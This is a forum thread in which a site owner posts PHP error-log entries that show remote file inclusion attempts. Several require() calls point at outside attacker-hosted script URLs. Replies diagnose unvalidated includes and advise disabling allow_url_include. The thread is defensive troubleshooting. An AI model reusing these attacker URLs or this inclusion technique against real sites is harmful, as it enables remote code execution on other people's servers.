Entries in error log

vertmonkee

Wasn't totally sure where to post this so hope this is ok.

I have some entries in my error log that seems very dodgy and was hoping for some opinions and advice on what to do.

Here are some examples.

[10-Feb-2009 17:42:25] PHP Warning: mail() [<a href='function.mail'>function.mail</a>]: SMTP server response: 550 5.7.1 Unable to relay for viadim0153157@gmail.com in http://pmloko.dominiotemporario.com/test.doc?.htm on line 22

[10-Feb-2009 20:23:13] PHP Warning: Unexpected character in input: '' (ASCII=2) state=2 in http://sebastians.wewillhostit.com/spn.txt?.htm on line 60

[10-Feb-2009 20:27:05] PHP Warning: require(http://uploader.ws/upload/200902/hook_choice_1.txt?.htm) [<a href='function.require'>function.require</a>]: failed to open stream: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

[10-Feb-2009 20:27:05] PHP Fatal error: require() [<a href='function.require'>function.require</a>]: Failed opening required 'http://uploader.ws/upload/200902/hook_choice_1.txt?.htm' (include_path='.;C:\php5\pear') in !!!!!PATH TO ONE OF MY PAGES!!!!! on line 44

[10-Feb-2009 22:03:36] PHP Warning: mail() [<a href='function.mail'>function.mail</a>]: SMTP server response: 501 5.5.4 Invalid Address in http://geocities.com/safeunknown/terra.txt? on line 14

[10-Feb-2009 22:17:44] PHP Warning: require(http://geocities.com/safeunknown/hot.txt?) [<a href='function.require'>function.require</a>]: failed to open stream: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

[10-Feb-2009 23:24:52] PHP Warning: require(http://174.133.195.99/~smile/neww.txt?.htm) [<a href='function.require'>function.require</a>]: failed to open stream: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

[10-Feb-2009 23:51:11] PHP Parse error: syntax error, unexpected $end in http://www.multiclinica.com.br/renato/xre.txt?.htm on line 266

None of the URLs or IP addreses are mine.

Has nayone got any ideas on what to do pleaase?

Thanks for nay help or suggestions.

NogDog

Sounds like one or more of your scripts may do an include/require using user input that is not sufficiently filtered/validated, while the server configuration allows includes via URL, making it possible to have your script run any PHP code a malicious user supplies to your script.

As an immediate fix while trying to narrow down the precise flaw(s), I would suggest turning off the allow_url_include configuration setting.

vertmonkee

Thanks for your quick response Nog Dog,

I'll take your advice and see if I can resolve the problem.

vertmonkee

That seems to have done the trick thank you.

bradgrafelman

You should still fix the security holes in your script - a simple configuration change or site transfer would re-expose them.

vertmonkee

Thanks for the advice bradgrafelman,

I'm currently re-developing the site after inheriting it so will be fixing all bugs accordingly.

Thanks again for the heads up though.